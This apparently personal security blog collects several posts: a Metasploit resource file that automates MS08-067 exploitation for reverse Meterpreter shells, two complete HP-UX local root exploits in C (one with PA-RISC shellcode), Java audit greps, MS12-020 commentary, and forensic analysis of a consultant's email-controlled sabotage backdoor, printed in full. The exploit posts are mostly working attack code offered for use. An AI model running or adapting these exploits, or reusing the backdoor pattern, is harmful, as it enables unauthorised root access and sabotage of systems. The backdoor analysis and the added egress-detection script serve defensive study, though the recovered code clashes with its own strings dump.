Automating low hanging fruit exploitation with Metasploit resource files

cowhat

Low hanging fruit is most of the time the first thing I try as a security consultant: while I kick off the scanners I usually also kick off “extra” scans that are not full probes but only look for specific vulnerabilities which, in my experience, are a quick way to gain Enterprise Administrator on the internal network.

So this time we are going to take a fairly easy example, MS08-067 (the ever present “will it ever die?” vulnerability), and automate it just to make the shells rain; the same approach can be changed for other vulnerabilities (which I will be updating and posting here).

A handy feature is that you can embed Ruby in a resource file between <ruby> and </ruby> tags.

I will dissect the entire resource file part by part, explain it and cover a few “tricks” I encountered to make it work:

use multi/handler
setg PAYLOAD windows/meterpreter/reverse_tcp
set ExitOnSession false

This just sets up the handler, the payload and ExitOnSession false; nothing much, and pretty standard in the resource files you can find on “them googles”. The next lines are:

if (framework.datastore['LHOST'] == nil )
    print_error("No LHOST set, where do we get the shells? go fix (must be global so setg instead of set)")
    return
end
if (framework.datastore['RHOSTS'] == nil)
    print_error("RHOSTS must be set globally (pro tip: use setg instead of set)... exiting")
    return
end

So this just checks that you have LHOST and RHOSTS set up. It does require setg, because the values have to survive into the module: if they are not set globally the setup is just gone. Pretty simple.


Video about Trapper 1.0 from Campus Party 2010 (SSH, SMB, FTP abuse and hijack using a hydra)

I found this gorgeous thing: 4 minutes, but it shows what Trapper is, some of its code and some examples that were done right there:

Talk “Trapper, de sniffer a hydra” (Trapper, from sniffer to hydra) by Jonathan Cabrera on Vimeo.


[Old Exploits] HPUX sastcpd local exploit

cowhat

Another oldie but goodie! There was a shell script roaming around, but I thought, as an exercise at the time (I can only presume, honestly; it’s been a while), to have the exploit set up in a .c file instead of having shell scripts all over the place (I personally dislike having exploits as shell scripts, as they might go a bit rogue on you if you are not in the right shell, like ksh).

So here is yet another HP-UX exploit, keeping them coming. Later I will dissect every single one of them, go through them and the techniques that evolved across all the exploits I post during this week, so come back to check them out!

Again, the includes should be in their angle-bracket form (<stdio.h> and so on); Google Prettify eats the brackets in the HTML, so they may show up quoted:

/*
  x-sastcpd.c

  XyXyXyXy
  To all the shit that has hit my life: "FUCK U I'LL SEE YOU IN HELL!"
*/

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

extern char **environ;

int main(int argc, char **argv) {
  char *env1, *env2;
  char buffer[1024];
  char *vuln;

  /* path to the target binary, taken from the command line */
  vuln = (char *)malloc(256);
  if(vuln == NULL) {
    perror("malloc");
    exit(1);
  }

  if(argc > 1) {
    snprintf(vuln, 255, "%s", argv[1]);
  }
  else {
    fprintf(stderr, "Usage: %s \n", argv[0]);
    exit(1);
  }

  if((env2 = getenv("HOME")) == NULL) {
    fprintf(stderr, "WHAT!? NO HOME?????\n");
    exit(-1);
  }

  /* authprog is pointed at this very binary, $HOME/argv[0] */
  fprintf(stderr, "Setting up the environment variable ...");
  snprintf(buffer, sizeof(buffer), "%s/%s", env2, argv[0]);
  setenv("authprog", buffer, 1);
  fprintf(stderr, "DONE\n");

  /* LOCK not in the environment yet: mark it and re-exec ourselves */
  if((env1 = getenv("LOCK")) == NULL) {
    fprintf(stderr, "sastcpd exploit by XyXyXyXy, .sh sux, all in one nice .c\n");
    setenv("LOCK", "XyXyXyXy", 0);
    execve(argv[0], argv, environ);
  }
  else {
    /* LOCK already set: try to keep uid/gid 0 and drop into a shell */
    seteuid(0);
    setuid(0);
    setegid(0);
    setgid(0);
    execl("/sbin/sh", "/sbin/sh", (char *)NULL);
  }

  /* only reached if the execve above failed: run the target directly */
  execl(vuln, vuln, (char *)NULL);

  return 0;
}

Simple and quick … ohhh yeah! keep it classy and GIT R DUN!


[Old Exploits] dtterm HP-UX local buffer overflow in the display variable exploit

cowhat

Well, here comes an oldie but goodie. The dtterm -display option is a very old bug; my google foo did not really show me any exploits for it (I saw some bugs about setting the DISPLAY= variable and having it crash, which I’ll presume is the same bug). I don’t have an HP-UX at hand; I found this in a very, very, VERY old directory while roaming around old HDs and thought to publish it since, again, I can’t find any for HP-UX.

This bug is annoyingly easy, yet so hard. At first I wanted to set it up just like I set up the Linux exploits (more on that later), by execve() and so forth, but … guess not! Anyway, this was around 2000, while I was honestly still fiddling with new techniques, browsing around and never publishing my exploits. I have removed the old header as it was holding an old handle :P Keep the mystique going! LoL!

Due to my noobness, please change the “stdio.h”, “unistd.h” and “stdlib.h” includes into their angle-bracket form, <stdio.h>, <unistd.h> and <stdlib.h> (Google Prettify is not kind to those, so they wouldn’t “show” in the HTML even though they are in the source; embedding fail).

/*
  x-dtterm-hpux.c

  XXXXXXXX
  "This bug is completly theoderaadtical"
*/

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>

#define BUFFSIZE  3000         /* length of the -display argument handed to dtterm */
#define ALIGN     0
#define NOP       0x08630243   /* 4-byte PA-RISC instruction repeated as the sled */
#define OFFSET    0
#define FIRSTJUMP 40           /* copies of the return address appended after the shellcode */
#define RETADDR   0x7b00484c

static char shellcode[] =
"\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40"
"\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\xbe"
"\x20\x20\x08\x01\xe4\x20\xe0\x08\x96\xd6\x05\x34\xde\xad\xca\xfe/bin/sh\xff";

/* Current stack pointer. PA-RISC inline assembly (HP-UX only): the value is
   left in the %ret0 register, which is why there is no C return statement. */
long get_sp(void) {
   __asm__("copy %sp,%ret0 \n");
}

int main(int argc, char **argv) {
  char c0de[4096];
  char *ch_ptr;
  int aux;
  unsigned long addr;
  unsigned long addr2;
  int align = ALIGN;
  int buffsize = BUFFSIZE;
  int offset = OFFSET;

  /* optional tuning from the command line: alignment (in words) and offset */
  if(argc > 1) align = atoi(argv[1]) * 4;
  if(argc > 2) offset = atoi(argv[2]);

  ch_ptr = c0de;

  addr = get_sp() + offset;          /* return address: stack pointer plus offset */
  addr2 = RETADDR + offset;
  addr2 = (unsigned long)c0de;       /* overridden with the buffer's own address; only printed below */

  /* NOP sled, written one byte at a time (big-endian); 40*4 bytes are left
     at the end for the FIRSTJUMP return-address copies */
  for (aux=0; aux<(buffsize - align - strlen(shellcode) - 40*4)/4; aux++) {
    *(ch_ptr++)=(NOP>>24)&255;
    *(ch_ptr++)=(NOP>>16)&255;
    *(ch_ptr++)=(NOP>>8)&255;
    *(ch_ptr++)=NOP&255;
  }

  memcpy(ch_ptr, shellcode, strlen(shellcode));

  ch_ptr+=strlen(shellcode);

  /* FIRSTJUMP copies of the return address, filling the 40*4 bytes reserved above */
  for (aux=0; aux<FIRSTJUMP; aux++) {
    *(ch_ptr++)=(addr>>24)&255;
    *(ch_ptr++)=(addr>>16)&255;
    *(ch_ptr++)=(addr>>8)&255;
    *(ch_ptr++)=addr&255;
  }

  /*
  for (aux=0; aux<800; aux++) {
    *(ch_ptr++)=(addr2>>24)&255;
    *(ch_ptr++)=(addr2>>16)&255;
    *(ch_ptr++)=(addr2>>8)&255;
    *(ch_ptr++)=addr2&255;
  }
  */
  c0de[BUFFSIZE-1]='\0';

  fprintf(stderr, "return address will be %#lx shellcode is at %#lx\n", addr, addr2);

  if(execl("/usr/dt/bin/dtterm", "dtterm", "-display", c0de, (char *)NULL) < 0) {
    fprintf(stderr, "whoa!\n");
    exit(1);
  }

  return 0;
}

Hope you like it. I have HP-UX 11.11 compiled exploit binaries, either dynamic or static, but who in his right mind would just grab a binary from someone and run it? If I can get hold of an HP-UX 11.11 machine with a gcc/cc compiler I can video the compilation, get the md5 and then upload.

Anyway back to the SUNDAY SUNDAY SUNDAY!!!


Static source code audit on terminal (AKA Glorified greps) Part 2

“Java Audit” time!!! This is also part of the bash functions for a VERY basic audit start on Java. The function will allow you to call it from wherever you are, and you will get 3 logs inside a folder called security_logs created in the same directory it was called from (obviously).

The rc file defines a function called auditjava(). What will it do? It will look for “dangerous” functions, the usual culprits in bugs :)

  • system()
  • `
  • getRuntime(), Runtime, .exec
  • preparedStatement(), executeQuery(), execute(), addBatch(), executeBatch()
  • getParameter, getQueryString, getHeader, getRequestURL, getCookies, getInputStream, getReader, getMethod, getProtocol, getServerName, getRemoteUser, getUserPrincipal

It will create 3 files within the security_logs directory:

  • command_injection.log
  • sql_functions.log
  • user_input.log

Static source code audit on terminal (AKA Glorified greps) Part 1

For anyone who has done a long source code audit: it is not really about finding the easy/low hanging fruit stuff, which can be slow and sometimes a bit “frustrating”.

I recently had a nice 660,000-line source code audit to be done in less than 2 weeks. The language was Java, so the first thing to be done was the basics (they had already hit it with Fortify and other tools, and were apparently looking for somewhat more interesting stuff).

Anyway, I still did my very low hanging fruit greps; with a codebase this huge I got hit with a few problems:

  • Code was in git, so all the files I checked out also had compiled jars, libraries, etc.
  • A quick and dirty grep will not give you context or show you in a fast and easy way where it is.
  • After a few hours you tend to hate ctrl-r’ing to find that grep, and redirecting into files gets messy if there is no structure.

So I guess everything was set up and ready for it. After running something as easy as some greps for a bunch of functions, to make sure they didn’t have anything weird going on, I needed logs and a decent output from everything, so I ended up creating a very, very simple grep:

    grep -r -b #file# #directory# | awk -F : '{print "Filename: "$1"\nline: "$2"\nmatch: "$3"\n\n"}'

So this is the result of a quick call for strcpy() on an android-sdk directory, as an example:

Command:
    fsckOSX:~ nahual$ grep -r -b strcpy mydroid/ | grep -v "Binary file" | awk -F : '{print "Filename: "$1"\nline: "$2"\nmatch: "$3"\n\n"}' | more

Output:

    Filename: mydroid/bionic/libc/Android.mk
    line: 3684
    match:  string/strcpy.c \
    
    
    Filename: mydroid/bionic/libc/arch-x86/string/strcpy.S
    line: 0
    match: /*       $OpenBSD
    
    
    Filename: mydroid/bionic/libc/arch-x86/string/strcpy.S
    line: 186
    match:  .section .gnu.warning.strcpy
    
    
    Filename: mydroid/bionic/libc/arch-x86/string/strcpy.S
    line: 216
    match:  .ascii "warning
    
    
    Filename: mydroid/bionic/libc/arch-x86/string/strcpy.S
    line: 462
    match: ENTRY(strcpy)
    
    
    Filename: mydroid/bionic/libc/bionic/realpath.c
    line: 2856
    match:          (void)strcpy(resolved, ".");
    
    
    Filename: mydroid/bionic/libc/bionic/realpath.c
    line: 4146
    match:  (void)strcpy(wbuf, p);
    
    
    Filename: mydroid/bionic/libc/bionic/system_properties.c
    line: 3699
    match:                 strcpy(name, pi->name);
    
    
    Filename: mydroid/bionic/libc/include/string.h
    line: 2244
    match: extern char*  strcpy(char *, const char *);
    
    
    Filename: mydroid/bionic/libc/netbsd/nameser/ns_samedomain.c
    line: 4331
    match:  strcpy(dst, src);
    ...
    
    fsckOSX:~ nahual$ 
    


ms12-020 saga: PoC exploit on pastebin and online rdp vulnerability scan: rdpcheck.com

ms12-020 PoC Leak

So then again, rolling along and checking istherdpexploitoutyet.com, I found an interesting thing: they link to a PoC on pastebin, and apparently it messes up your box (I wonder how many people lost boxes on that one). But they also link to another cool site, rdpcheck.com: they scan you back to check if you are vulnerable to the RDP exploit, and they even check that you don’t use disposable addresses, which is very interesting and cool.

So I put in my gmail address and clicked test. I don’t have any RDP at my home address, but I wanted to see how they handle closed ports; then I’ll set up an exploitable RDP and let them scan me :) and update this post!

After you click on test you will receive an email like this (IP address removed):

IP address tested: XXX.XXX.XXX.X
Time of test: Sat, 24 Mar 2012 14:50:38 EST
Result: RDP Port Filtered (Inconclusive)

Hmmm… We were unable to determine if we could access Remote Desktop Protocol from the Internet on its standard port. When we tested there was no response. This generally means that there is a firewall configured to be invisible – which is a good thing – but it can also be caused by network issues, ISP filtering, etc.
Because of this we cannot make a confident assessment of your exposure.

To err on the safe side you should assume that this means that your network is potentially vulnerable to exploitation of the MS12-020 RDP vulnerability from the Internet and is likely to contain unpatched systems.
Here’s a few things you can do…

Patch ALL of your Windows systems with the MS12-020 patch from Microsoft. To do this simply run Windows Update until it no longer suggests updates, or you can manually download Microsoft security bulletin and patches from Microsoft’s advisory here.

Check that you’ve patched ALL of your systems. Not just the Internet facing ones. When this vulnerability gets turned into a self-propagating RDP worm you’ll thank us for this advice.

Close off port Remote Desktop Services (RDP) to the Internet. RDP runs on TCP port 3389. If this means nothing to you, ask your I.T. guy.

Disable RDP on machines that don’t need it. RDP is fantastically useful, but if you don’t need it, turn it off.

Give your I.T. guy a smack on the wrist and tell him/her to stop running Remote Desktop Protocol on the Internet. This is a risky practice, superbug or no superbug, because it gives full access to a machine. Use a VPN for remote access instead.

From Microsoft: “Consider how you might harden your environment against unauthenticated, attacker-initiated RDP connections.” Some of the tips here are a part of this general advice. If you need more help with this get in touch via our contact form.

Read, understand and action the advice from Microsoft here and here. If none of it makes sense to you, talk to your I.T. guy or get in touch via our contact form.

This is pretty cool and useful, at least for the average joe :)

I still wonder … IS THE RDP EXPLOIT OUT YET!?!?!?!?


[Your worst enemy: The rogue consultant/admin] py_util.pyc LOCK/UNLOCK backdoor over email

I recently had to do a fast forensic job for a friend. He asked me for some help as he was taking over some business which had been “abandoned” by an “open source consultant”, which is to say someone who pretty much installs everything on Linux and, in this case, does half the coding.

The problem arose when, within the hour of them taking over the network, a critical system for the business stopped working. This was more than suspicious, as before, in another business that was also administered by this person, some files were erased and configurations lost when it was transitioned to another admin, because of a lack of administration and ethics on the admin’s part.

First I tried to decompile the python files from the Django server; this was because obviously all the servers were blocked except for port 80. My friend innocently forgot to block all access to the internet, as he thought that was not that hardcore important (#FAIL), and he didn’t really think this person (who now actually is consulting for a major bank in Mexico) would backdoor and do this type of stuff.

The first thing was to run strings on it to figure out what is there (credentials and paths removed for security reasons):

    fsckOSX:~ nahual$ strings py_util.pyc
    EmailMultiAlternatives(
    MIMEImage(
    datetimeN(
    Parsers
    fxxxxxxxxxxo@gmail.comt
    mxxxgyyczzt
    LOCKSYSTEMt
    UNLOCKSYSTEMt
    GETIPs$
    /home/xxxxxxx/svn/yyyyyyyy/.python.logc
    pop.gmail.comi
    Subjectt
    bloqueandot
    desbloqueandot8
    2baa224d0a3515912218fd88c1dd9d90d347c451c67811ac6240f4a1(
    poplibt
    POP3_SSLt
    usert
    pass_t
    passwdt
    Exceptiont
    lent
    listt
    ranget
    retrt
    joinR
    parsestrt
    LOCKt
    opent
    file_logt
    writet
    closet
    UNLOCKR
    check_ipt
    quit(
    errt
    numerot
    responset
    headerLinest
    bytest
    mensajet
    emailt
    subjectt
    /home/xxxxxxx/svn/yyyyyyy/../yyyyyyy/py_util.pyt
    check_locker
    setup_environ(
    BeautifulSoups
    hxxxxxxx3@gmail.comR

    http://www.cualesmiip.comt

    divt
    miipt
    IP del servidort
    from_emails
    text/html(
    urllib2t
    django.core.managementR/
    xml.dom.minidomR0
    settingst
    urlopent
    readt
    findt
    findAllR
    DEFAULT_FROM_EMAILt
    attach_alternativet
    send(
    xmlR0
    listmailt
    contentt
    feedR&
    html_contentR,
    msg(
    /home/xxxxxxx/svn/yyyyyy/../yyyyyy/py_util.pyR
    __main__(
    django.core.mailR
    email.MIMEImageR
    smtplibR
    email.ParserR
    __name__(
    /home/xxxxxxxx/svn/yyyyyy/../yyyyy/py_util.pyt

    fsckOSX:~ nahual$

py_util.pyc wouldn’t decompile quickly, so after putting it into IDA and other nice decompilers this is what was found (credentials removed for security reasons):


from django.core.mail import EmailMultiAlternatives
from email.MIMEImage import MIMEImage
from datetime import datetime
import smtplib
import poplib
from email.Parser import Parser

# hard-coded mailbox credentials and the "command" subjects (Python 2, as recovered)
user = 'xxxxxx'
passwd = 'xxxxxxxx'
LOCK = 'LOCKSYSTEM'
UNLOCK = 'UNLOCKSYSTEM'
GETIP = 'GETIP'
file_log = '/home/xxxxx/svn/yyyyyy/.python.log'

def check_locker():
    # poll the gmail mailbox over POP3S (TCP 995) and act on each Subject line
    try:
        m = poplib.POP3_SSL('pop.gmail.com', 995)
        m.user(user)
        m.pass_(passwd)
    except Exception, err:
        print err
    else:
        numero = len(m.list()[1])
        for i in range(numero):
            (response, headerLines, bytes) = m.retr(i + 1)
            mensaje = '\n'.join(headerLines)
            p = Parser()
            email = p.parsestr(mensaje)
            subject = email['Subject']
            if (subject == LOCK):
                print 'bloqueando'  # "locking": empty the file the application depends on
                f = open(file_log, 'w')
                f.write('')
                f.close()
            elif (subject == UNLOCK):
                print 'desbloqueando'  # "unlocking": restore its content
                f = open(file_log, 'w')
                f.write('xxxxxxxxxxxxx')
                f.close()
            elif (subject == GETIP):
                check_ip()
        m.quit()

def check_ip():
    # look up the server's public IP on a "what is my IP" page and mail it out
    # (the strings dump above lists http://www.cualesmiip.com as that page)
    import urllib2
    from django.core.management import setup_environ
    import xml.dom.minidom
    from BeautifulSoup import BeautifulSoup
    import settings
    setup_environ(settings)
    listmail = ['xxxxxxxx@gmail.com']
    content = ''
    feed = urllib2.urlopen('http://www.google.com')
    response = BeautifulSoup(feed.read())
    html_content = response.find('div', {'id': 'miip'}).findAll('b')[0]
    subject = 'IP del servidor'
    msg = EmailMultiAlternatives(subject, content, to=listmail, from_email=settings.DEFAULT_FROM_EMAIL)
    msg.attach_alternative(html_content, 'text/html')
    msg.send()

if (__name__ == '__main__'):
    check_ip()

As you can see, the backdoor is pretty small and “efficient”: it checks a gmail account, and if an email with the subject LOCKSYSTEM is sent to that account it will automatically shut down the application; you can of course unlock the system with another email.

This might have been coded because they thought maybe the client wouldn’t pay them? Why would he code something like this without the client’s consent? No documentation was delivered with the code, and as soon as the admin/developer was let go the system was shut down within the hour. It sounds to me more like a blackmail function than a normal admin function, as it only turns off the system: no backups, nothing.

This makes me wonder why this would be created, or executed? I thought about writing a fast and ugly rule so that if anything like this happened again at least the Snorts would alert, and told my friend to lock down the firewall rules, but this lack of ethics is overwhelming. I wonder what the bank would think of him being used to backdoor stuff to keep a foot in the door? jeeeeezzzzz

A Snort rule would not really work, as it’s doing POP3 over SSL, but then blocking port 993 should lock him out. Still … why do people do this? Don’t they understand this lack of ethics is preposterous?
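Since the TLS payload is opaque to Snort, the thing to look for is the beaconing itself: an application server that keeps opening outbound mail-client connections on a timer, the way the recovered check_locker() does to pop.gmail.com on TCP 995 (POP3S; 993 is IMAPS). The script below is an added example of mine, not part of the post; it assumes iptables LOG lines carrying an “EGRESS:” prefix and runs over constructed sample lines.

```shell
#!/bin/sh
# Added example, not from the post: flag internal hosts polling a mailbox.

# Ports a mail-polling client needs; an application server has no business
# opening these outbound. The backdoor above used 995 (POP3S).
MAIL_PORTS='110|143|993|995'

# mail_pollers: read iptables LOG lines (assumed "EGRESS:" prefix) on stdin
# and print "SRC count" for every host with 2+ outbound mail connections,
# busiest first. One hit could be a person; repeated hits are a poller.
mail_pollers() {
    awk -v ports="$MAIL_PORTS" '
        /EGRESS:/ {
            src = ""; dpt = ""
            for (i = 1; i <= NF; i++) {
                if ($i ~ /^SRC=/) src = substr($i, 5)
                if ($i ~ /^DPT=/) dpt = substr($i, 5)
            }
            if (src != "" && dpt ~ ("^(" ports ")$")) hits[src]++
        }
        END { for (h in hits) if (hits[h] >= 2) print h, hits[h] }
    ' | sort -k2,2nr
}

# Constructed sample (documentation-range addresses): 10.0.0.5 beacons to
# POP3S every five minutes; 10.0.0.9 makes one HTTPS and one IMAPS request.
SAMPLE_LOG='Mar 24 14:50:38 fw kernel: EGRESS: IN=eth1 OUT=eth0 SRC=10.0.0.5 DST=203.0.113.10 PROTO=TCP SPT=40001 DPT=995 SYN
Mar 24 14:55:38 fw kernel: EGRESS: IN=eth1 OUT=eth0 SRC=10.0.0.5 DST=203.0.113.10 PROTO=TCP SPT=40002 DPT=995 SYN
Mar 24 14:56:10 fw kernel: EGRESS: IN=eth1 OUT=eth0 SRC=10.0.0.9 DST=198.51.100.7 PROTO=TCP SPT=51000 DPT=443 SYN
Mar 24 14:57:02 fw kernel: EGRESS: IN=eth1 OUT=eth0 SRC=10.0.0.9 DST=203.0.113.11 PROTO=TCP SPT=51001 DPT=993 SYN
Mar 24 15:00:38 fw kernel: EGRESS: IN=eth1 OUT=eth0 SRC=10.0.0.5 DST=203.0.113.10 PROTO=TCP SPT=40003 DPT=995 SYN'

# check_sample: run the detection over the constructed log.
check_sample() {
    printf '%s\n' "$SAMPLE_LOG" | mail_pollers
}
```

In production, feed it the real log (`grep EGRESS: /var/log/kern.log | mail_pollers`) and pair it with an egress rule that only lets the actual mail relay reach those ports.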


MS12-020, the saga continues: exploit code published for the RDP Chinese worm leaked from Microsoft?

I was sent this link which is hilarious: http://istherdpexploitoutyet.com/

It has some really short information on the exploit and PoC and, obviously, who bought it (yes kids, ZDI bought this one, gave it to Microsoft and then one of them managed to leak it), but apparently the original exploit code was leaked (complete article HERE).

From the article:

“Chinese hackers have released proof-of-concept code that provides a roadmap to exploit a dangerous RDP (remote desktop protocol) vulnerability that was patched by Microsoft earlier this week.

The publication of the code on a Chinese language forum heightens the urgency to apply Microsoft’s MS12-020 update, which addresses a remote, pre-authentication, network-accessible code execution vulnerability in Microsoft’s implementation of the RDP protocol.”

Well, I’m not fluent in Chinese at all, BUT when I went to the website it clearly says at the top:

“0day discount
This BLOG from time to time the market of 0day of exp”

Errr, I’m sorry, but that does not tell ANYONE to go and patch as the article says; they actually go even further, saying: “Thanks to 360 friends to provide the EXP.” Well, apparently the 360 guys managed to grab that exploit, which apparently has a special signature from the researcher Luigi Auriemma (@luigi_auriemma).

That is a good practice and I hope it catches on again: watermarking the PoCs so you can see where the leak is. The interesting part is … who is owned by the Chinese? ZDI? Or Microsoft? If they leaked that, which others have been leaked?

This bug will end up showing more flaws in how it was handled and how its PoC leaked than the bug itself!

UPDATE:

In this tweet (https://twitter.com/#!/luigi_auriemma/status/180646548395401216) Luigi Auriemma confirms Microsoft was the leak.

Luigi Auriemma @luigi_auriemma
in case isn’t clear yet: rdpclient.exe seems written by Microsoft using the original packet poc I sent to ZDI. MS is the source of the leak

His advisory can be seen HERE


MS12-020 the new MS08-067?

From Microsoft’s support website:

MS12-020: Vulnerabilities in Remote Desktop could allow remote code execution: March 13, 2012

The interesting thing is that on this link (http://support.microsoft.com/kb/2671387) it says in the more information tab:

“2667402 MS12-020: Description of the security update for Terminal Server Denial of Service Vulnerability: March 13, 2012″

But then on this link (http://blogs.technet.com/b/msrc/archive/2012/03/13/strength-flexibility-and-the-march-2012-security-bulletins.aspx) they actually talk about a critical one, which means it’s exploitable. This has turned a lot of heads and made people wonder if this bug will end up being the new MS08-067 due to its longevity (God knows finding that one will render Enterprise Admin or Domain Admin too quickly most of the time anyway).

Let’s see how fast the guys at the Metasploit project (www.metasploit.com) will come up with an exploit for it!

(NOTE: Thank you so much flacman for catching the typo .. sorry!!!!)
